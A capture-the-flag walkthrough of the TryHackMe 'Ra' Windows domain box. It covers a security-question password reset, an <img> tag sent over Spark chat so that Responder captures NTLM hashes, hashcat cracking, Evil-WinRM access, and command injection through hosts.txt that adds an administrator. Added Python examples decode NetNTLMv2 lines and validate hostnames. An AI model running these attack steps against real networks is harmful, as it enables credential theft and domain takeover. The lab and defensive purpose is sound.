Ra - TryHackMe Walkthrough
Ra - “You have found WindCorp’s internal network and their Domain Controller. Can you pwn their network?” This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.
URL: Ra
Difficulty: Hard
Author: 4ndr34zz
Story
You have gained access to the internal network of WindCorp, the multibillion dollar company, running an extensive social media campaign claiming to be unhackable (ha! so much for that claim!).
Next step would be to take their crown jewels and get full access to their internal network. You have spotted a new windows machine that may lead you to your end goal. Can you conquer this end boss and own their internal network?
Happy Hacking!
@4nqr34z and @theart42
Enumeration
We are given the IP 10.10.51.76; add it to /etc/hosts as ra.thm and run a port scan:
nmap -p- -A ra.thm -o portscan
PORT      STATE SERVICE           VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp    open  http              Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Windcorp.
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-ntlm-info:
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|_  Product_Version: 10.0.17763
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: commonName=Windows Admin Center
| Subject Alternative Name: DNS:WIN-2FAA40QQ70B
| Not valid before: 2020-04-30T14:41:03
|_Not valid after:  2020-06-30T14:41:02
|_ssl-date: 2020-07-28T13:43:48+00:00; -1s from scanner time.
| tls-alpn:
|_  http/1.1
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2179/tcp  open  vmrdp?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server     Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2020-07-28T13:43:05+00:00
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Not valid before: 2020-04-30T06:40:02
|_Not valid after:  2020-10-30T06:40:02
|_ssl-date: 2020-07-28T13:43:47+00:00; -1s from scanner time.
5222/tcp  open  jabber
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
|   STARTTLS Failed
|   info:
|     unknown:
|     stream_id: 915zwyjswx
|     auth_mechanisms:
|     xmpp:
|       version: 1.0
|     features:
|     errors:
|       invalid-namespace
|       (timeout)
|     capabilities:
|_    compression_methods:
5223/tcp  open  ssl/hpvirtgrp?
5229/tcp  open  jaxflow?
5262/tcp  open  jabber
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
|   STARTTLS Failed
|   info:
|     unknown:
|     stream_id: 4vx13wz4gf
|     auth_mechanisms:
|     xmpp:
|       version: 1.0
|     features:
|     errors:
|       invalid-namespace
|       (timeout)
|     capabilities:
|_    compression_methods:
5269/tcp  open  xmpp              Wildfire XMPP Client
| xmpp-info:
|   Respects server name
|   STARTTLS Failed
|   info:
|     unknown:
|     stream_id: 345hqjca3g
|     auth_mechanisms:
|     xmpp:
|       version: 1.0
|     features:
|     errors:
|       host-unknown
|       (timeout)
|     capabilities:
|_    compression_methods:
5270/tcp  open  ssl/xmp?
5276/tcp  open  ssl/unknown
5985/tcp  open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp  open  http              Jetty 9.4.18.v20190429
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
7443/tcp  open  ssl/http          Jetty 9.4.18.v20190429
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
7777/tcp  open  socks5            (No authentication; connection not allowed by ruleset)
| socks-auth-info:
|_  No authentication
9090/tcp  open  zeus-admin?
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Tue, 28 Jul 2020 13:40:53 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Tue, 28 Jul 2020 13:41:00 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   JavaRMI, drda, ibm-db2-das, informix:
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   SqueezeCenter_CLI:
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   WMSRequest:
|     HTTP/1.1 400 Illegal character CNTL=0x1
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp  open  ssl/xmltec-xmlmail?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP:
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Tue, 28 Jul 2020 13:41:12 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Tue, 28 Jul 2020 13:41:12 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help:
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck:
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest:
|     HTTP/1.1 400 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq:
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
9389/tcp  open  mc-nmf            .NET Message Framing
49669/tcp open  msrpc             Microsoft Windows RPC
49674/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc             Microsoft Windows RPC
49676/tcp open  msrpc             Microsoft Windows RPC
49744/tcp open  msrpc             Microsoft Windows RPC
49910/tcp open  msrpc             Microsoft Windows RPC
A lot of ports are open; let's start with port 80:
http://ra.thm/
I found something interesting when analysing the web requests for this site. I opened the browser's developer tools, went to the “Network” tab (Firefox) and entered a search query on the company portal to see what requests it made.
Here is what I saw:
There are a number of GET requests to “fire.windcorp.thm:9090” for the images used as icons under “Our IT support-staff”. The request paths also reveal the usernames associated with each picture. I noted these down in a .txt file.
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
Let’s add this domain to our hosts file:
sudo nano /etc/hosts
Add fire.windcorp.thm to the file:
Let’s visit this new domain:
http://fire.windcorp.thm:9090
We have a login page for Openfire, and the page identifies it as Openfire version 4.5.1; however, I couldn't find any obvious vulnerabilities for that version.
I also wanted to play around with the “forgotten password” function.
It offers a choice of security questions, one of which asks about a pet.
Under “Our Employees”, there is a woman named Lily Levesque who is with a dog.
I also remember seeing her image when inspecting the web requests - here is the file name:
lilyleAndSparky.jpg
It looks like her username could be lilyle and her dog is named Sparky.
We are able to reset her password to ChangeMe#1234.
This is a great example of how far enumeration can go when collecting information about your target(s). You can imagine how effective social engineering could be in situations like this as well.
lilyle
These credentials did not work for the Openfire service, so I went back to the other services from our port scan.
Port 389 shows Active Directory (LDAP), so these are probably domain credentials. Let's use them to list the SMB shares on this system.
$ smbmap -u lilyle -p ChangeMe#1234 -H ra.thm
[+] IP: ra.thm:445..    Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        Shared                                                  READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share
        Users                                                   READ ONLY
Have a look at the “Shared” directory:
$ smbclient //ra.thm/Shared -U lilyle --password ChangeMe#1234
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat May 30 01:45:42 2020
  ..                                  D        0  Sat May 30 01:45:42 2020
  Flag 1.txt                          A       45  Fri May  1 16:32:36 2020
  spark_2_8_3.deb                     A 29526628  Sat May 30 01:45:01 2020
  spark_2_8_3.dmg                     A 99555201  Sun May  3 12:06:58 2020
  spark_2_8_3.exe                     A 78765568  Sun May  3 12:05:56 2020
  spark_2_8_3.tar.gz                  A 123216290 Sun May  3 12:07:24 2020

                15587583 blocks of size 4096. 10897965 blocks available
We have our first flag and some “spark” installer files. Spark is an XMPP (Jabber) client, and our port scan showed jabber ports open, so these files are interesting. Download the Spark package, install it and launch it:
GET spark_2_8_3.deb
sudo dpkg -i spark_2_8_3.deb
spark
Now that we have Spark running on our local machine, we can try the credentials we found to log in to her account.
Make sure you check “Accept all certificates” and “Disable hostname verification” on advanced options.
We are logged in:
Since we now have an authenticated Spark user, I went straight to searching for Spark exploits.
I came across this interesting article on Github:
buse
Sending the following <img> tag in a chat makes the recipient's client fetch the image from our host and authenticate with NTLM, which reveals that user's NetNTLMv2 challenge-response.
<img src=[external_ip]/test.img>
It looks like the user Buse is online:
His username is [email protected], so start a chat with him. We will use Responder to listen for the NTLM authentication. Note that you will need to stop other services bound to the ports Responder needs (I had to stop my SSH server for this to work).
sudo responder -I tun0
Or, download the newest version from github:
git clone https://github.com/lgandx/Responder.git
cd Responder
sudo python3 Responder.py -I tun0
Now we can send the <img> tag to Buse:
<img src="http://10.9.6.63/fedai.jpg">
We got a hit!
[+] Listening for events...
[HTTP] Sending NTLM authentication request to 10.10.97.155
[HTTP] GET request from: 10.10.97.155  URL: /fedai.jpg
[HTTP] Host       : 10.9.6.63
[HTTP] NTLMv2 Client   : 10.10.97.155
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash     : buse::WINDCORP:438ba8a6154108d5:84D16DD38C8DD23952D518A3FDEB2F04:0101000000000000D27CA1B08F65D601928E5FABDAFA236E000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000001000000002000004962BEBF4B0492439D94E13699F51104AE7010E99EBF72263C47ACBD91DA470D0A00100000000000000000000000000000000000090000000000000000000000
I will now use hashcat to crack this. Put the hash into a .txt file and run hashcat in mode 5600 (NetNTLMv2; mode 1000 is for stored NT hashes, not for a captured challenge-response) with the rockyou wordlist:
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.0.0) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-6500 CPU @ 3.20GHz, 2890/2954 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

BUSE::WINDCORP:8b11ab5cf6e9e098:222f76790a6fa3f4f6b22215dc4b32d3:01010000000000005672c2b08f65d601ed6cc48244ccb53c000000000200060053004d0042000100160053004d0042002d0054004f004f004c004b00490054000400120073006d0062002e006c006f00630061006c000300280073006500720076006500720032003000300033002e0073006d0062002e006c006f00630061006c000500120073006d0062002e006c006f00630061006c0008003000300000000000000001000000002000004962bebf4b0492439d94e13699f51104ae7010e99ebf72263c47acbd91da470d0a00100000000000000000000000000000000000090000000000000000000000:u*********1

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: BUSE::WINDCORP:8b11ab5cf6e9e098:222f76790a6fa3f4f6b...000000
Time.Started.....: Wed Jul 29 11:11:02 2020 (3 secs)
Time.Estimated...: Wed Jul 29 11:11:05 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   953.9 kH/s (1.94ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2961408/14344385 (20.65%)
Rejected.........: 0/2961408 (0.00%)
Restore.Point....: 2957312/14344385 (20.62%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: v10014318 -> utrox11

Started: Wed Jul 29 11:10:30 2020
Stopped: Wed Jul 29 11:11:07 2020
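The line Responder printed, and the one hashcat cracked, are in the NetNTLMv2 format user::domain:ServerChallenge:NTProofStr:blob, where the blob is the NTLMv2_CLIENT_CHALLENGE structure from MS-NLMP (timestamp, client challenge and a list of AV_PAIR attributes). The parser below is an added example and not part of the original walkthrough: it splits that line, decodes the blob, and chooses the hashcat mode from the field lengths (5600 for NetNTLMv2, 5500 for NetNTLMv1). The sample is the line captured above; the NetNTLMv1 check uses a constructed line with the right field lengths. For an analyst, decoding the AV pairs shows what the client was actually authenticating to (here the names the rogue server presented, not a real WINDCORP host) and when, which is useful when triaging a captured response.

```python
"""Decode a NetNTLMv2 line as Responder prints it and hashcat -m 5600 reads it.

Added example, not part of the original walkthrough. Field layout follows
MS-NLMP 2.2.2.8 (NTLMv2_RESPONSE) and 2.2.2.1 (AV_PAIR).
"""
import struct
from datetime import datetime, timedelta, timezone

# AV_PAIR ids from MS-NLMP 2.2.2.1
AV_IDS = {
    0x0000: "MsvAvEOL",
    0x0001: "MsvAvNbComputerName",
    0x0002: "MsvAvNbDomainName",
    0x0003: "MsvAvDnsComputerName",
    0x0004: "MsvAvDnsDomainName",
    0x0005: "MsvAvDnsTreeName",
    0x0006: "MsvAvFlags",
    0x0007: "MsvAvTimestamp",
    0x0008: "MsvAvSingleHost",
    0x0009: "MsvAvTargetName",
    0x000A: "MsvAvChannelBindings",
}
UTF16_IDS = {0x0001, 0x0002, 0x0003, 0x0004, 0x0005, 0x0009}

# The line Responder captured on the page, copied verbatim (split for readability).
SAMPLE = (
    "buse::WINDCORP:438ba8a6154108d5:84D16DD38C8DD23952D518A3FDEB2F04:"
    "0101000000000000D27CA1B08F65D601928E5FABDAFA236E00000000"
    "0200060053004D004200"
    "0100160053004D0042002D0054004F004F004C004B0049005400"
    "0400120073006D0062002E006C006F00630061006C00"
    "0300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C00"
    "0500120073006D0062002E006C006F00630061006C00"
    "0800300030000000000000000100000000200000"
    "4962BEBF4B0492439D94E13699F51104AE7010E99EBF72263C47ACBD91DA470D"
    "0A00100000000000000000000000000000000000"
    "09000000"
    "00000000"
    "00000000"
)


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def hashcat_mode(line: str) -> int:
    """Pick the hashcat mode from the field lengths of a user::domain:... line.

    NetNTLMv2: 16-hex server challenge, 32-hex NTProofStr, variable blob -> 5600
    NetNTLMv1: 48-hex LM response, 48-hex NT response, 16-hex challenge -> 5500
    Mode 1000 is the stored NT hash, which a challenge-response capture is not.
    """
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("not a user::domain:a:b:c NetNTLM line")
    if len(parts[3]) == 16 and len(parts[4]) == 32:
        return 5600
    if len(parts[3]) == 48 and len(parts[4]) == 48 and len(parts[5]) == 16:
        return 5500
    raise ValueError("unrecognised field lengths")


def parse_av_pairs(data: bytes) -> dict:
    """Walk the AV_PAIR list (id:2, len:2, value) until MsvAvEOL."""
    pairs = {}
    off = 0
    while off + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, off)
        off += 4
        value = data[off:off + av_len]
        off += av_len
        if av_id == 0x0000:          # MsvAvEOL terminates the list
            break
        name = AV_IDS.get(av_id, f"unknown_0x{av_id:04x}")
        pairs[name] = value.decode("utf-16-le") if av_id in UTF16_IDS else value.hex()
    return pairs


def parse_netntlmv2(line: str) -> dict:
    """Return the named fields of a NetNTLMv2 line with the blob decoded."""
    if hashcat_mode(line) != 5600:
        raise ValueError("not a NetNTLMv2 line")
    user, _, domain, server_chal, ntproof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    # RespType(1) HiRespType(1) Reserved1(2) Reserved2(4) TimeStamp(8) ClientChallenge(8) Reserved3(4)
    resp_type, hi_resp, _r1, _r2, ts, client_chal, _r3 = struct.unpack_from("<BBHIQ8sI", blob, 0)
    if (resp_type, hi_resp) != (1, 1):
        raise ValueError("unexpected NTLMv2 response type")
    return {
        "user": user,
        "domain": domain,
        "server_challenge": server_chal.lower(),
        "ntproofstr": ntproof.lower(),
        "client_challenge": client_chal.hex(),
        "timestamp": filetime_to_datetime(ts),
        "av_pairs": parse_av_pairs(blob[28:]),
    }


if __name__ == "__main__":
    print("hashcat mode:", hashcat_mode(SAMPLE))
    for key, value in parse_netntlmv2(SAMPLE).items():
        print(f"{key:16}: {value}")
```

The decoded AV pairs of the sample name SMB-TOOLKIT / server2003.smb.local as the server, which is what the spoofing host advertised, not any WINDCORP machine; seeing target names that do not match your domain in a captured or logged NTLM exchange is a good indicator that a client was coerced into authenticating to a rogue host.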
Since port 5985 (WinRM) is open, we can use Evil-WinRM to get a shell as this user now that we have his credentials.
$ cat portscan | grep 5985
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Here is the repo for Evil-WinRM:
$ ruby evil-winrm.rb -i ra.thm -u buse -p u*********1

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\buse\Documents> whoami
windcorp\buse
Enumerate a bit and you will come across the “scripts” directory:
*Evil-WinRM* PS C:\> dir scripts

    Directory: C:\scripts

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/3/2020   5:53 AM           4119 checkservers.ps1
-a----        7/29/2020   3:36 AM             31 log.txt
log.txt records the time when “checkservers.ps1” was last run, and the timestamp is recent, which suggests the script runs regularly (the script's own comments mention a scheduled task). Read through the script:
# Read the File with the Hosts every cycle, this way you can add/remove hosts
# from the list without touching the script/scheduled task,
# also hash/comment (#) out any hosts that are going for maintenance or are down.
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
It reads its list of hosts from C:\Users\brittanycr\hosts.txt.
Unfortunately, we do not have access to her files.
Let's check what groups exist and which ones we are a member of:
*Evil-WinRM* PS C:\Users\brittanycr> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                          Attributes
========================================== ================ ============================================ ==================================================
Everyone                                   Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators                  Alias            S-1-5-32-548                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users               Alias            S-1-5-32-555                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
WINDCORP\IT                                Group            S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448
Refer to this article to understand the different groups:
Active Directory Security Groups - Microsoft Docs
The Account Operators group grants limited account-creation privileges to its members: they can create and manage users and groups in the domain, including the group's own membership and that of the Server Operators group.
brittanycr
So, let's change the password of brittanycr's account. Note that the new password must meet the domain password policy requirements.
Here is the AD password policy:
*Evil-WinRM* PS C:\Users\brittanycr> net user /domain brittanycr CyberGoat1234
The command completed successfully.
I actually tried to create a new user and add it to the Administrators group, but I was denied access despite being an Account Operator: members of that group are explicitly prevented from managing the Administrators group.
So I continued down the brittanycr route and accessed her share with the following command:
$ smbclient \\\\ra.thm\\Users -U brittanycr
Enter WORKGROUP\brittanycr's password: CyberGoat1234
We can access the hosts.txt file now as we are authenticated as brittanycr.
GET hosts.txt
This is what the file contains:
$ cat hosts.txt
google.com
cisco.com
Since we couldn't add a user to the Administrators group ourselves, maybe we can get the script that reads hosts.txt to do it for us.
Privilege Escalation - GHANDI
I created a user called “ghandi” with the following command:
*Evil-WinRM* PS C:\Users\buse\Documents> net user ghandi CyberGoat1234 /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\buse\Documents> net localgroup Administrators ghandi /add
net.exe : System error 5 has occurred.
    + CategoryInfo          : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

Access is denied.
As you can see, access is denied when trying to add ghandi to the Administrators group. Let's append that command to a hostname line in our hosts.txt and upload it, hoping the script executes it.
$ cat hosts.txt
google.com
notadomain.ru; net localgroup Administrators ghandi /add
put hosts.txt
Now we can attempt to log in as ghandi:
evil-winrm -i ra.thm -u ghandi -p CyberGoat12345
We're logged in as ghandi!
We gave ourselves admin rights, so all that remains is to find the last flag.
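The escalation above worked because checkservers.ps1 treats every line of hosts.txt as trustworthy and ends up running it as part of a command. The following is an added example, written in Python rather than PowerShell and not the box's own script, of the input handling that would have stopped it: each entry is parsed out of the file, accepted only if it is a syntactically valid hostname, and handed to the probe as a separate argument so that it can never become a second command. The sample inputs are the clean and tampered hosts.txt contents from this walkthrough; `ping -c`/`-W` are assumed to be Linux iputils flags.

```python
"""Safe handling of an operator-maintained host list.

Added example, not the box's checkservers.ps1. It reads the same file format
(one host per line, '#' marks a comment) but validates every entry before use
and never splices it into a command string.
"""
import re
import subprocess
from typing import List, Tuple

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# each label 1-63 chars and not starting or ending with a hyphen.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?:{LABEL}\.)*{LABEL}$")
MAX_HOSTNAME = 253


def is_hostname(value: str) -> bool:
    """True only for a bare hostname; shell metacharacters, spaces, etc. all fail."""
    return len(value) <= MAX_HOSTNAME and HOSTNAME_RE.match(value) is not None


def load_hosts(text: str) -> Tuple[List[str], List[str]]:
    """Parse a hosts list. Returns (accepted, rejected).

    Blank lines and lines beginning with '#' are skipped. Any other line that is
    not a plain hostname is reported rather than silently used.
    """
    accepted, rejected = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        (accepted if is_hostname(line) else rejected).append(line)
    return accepted, rejected


def probe(host: str, count: int = 1, timeout_s: int = 5) -> bool:
    """Ping one host (Linux iputils flags assumed). The hostname travels as its
    own argv element, so nothing in it is ever interpreted by a shell."""
    if not is_hostname(host):
        raise ValueError(f"refusing to probe invalid hostname: {host!r}")
    result = subprocess.run(
        ["ping", "-c", str(count), "-W", str(timeout_s), host],
        capture_output=True, check=False,
    )
    return result.returncode == 0


# Constructed inputs: the benign file and the tampered file seen on the page.
CLEAN = "google.com\ncisco.com\n"
TAMPERED = "google.com\nnotadomain.ru; net localgroup Administrators ghandi /add\n"

if __name__ == "__main__":
    for name, text in (("clean", CLEAN), ("tampered", TAMPERED)):
        ok, bad = load_hosts(text)
        print(f"{name}: accepted={ok} rejected={bad}")
```

Rejected entries are the thing to alert on: a monitoring script that logs "rejected line in hosts.txt" turns a silent command-injection attempt into a detectable event. The same principle applies to the PowerShell original: validate each line against a hostname pattern and pass it to Test-Connection or ping as an argument, never through Invoke-Expression or a string-built command.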
Thank you for reading.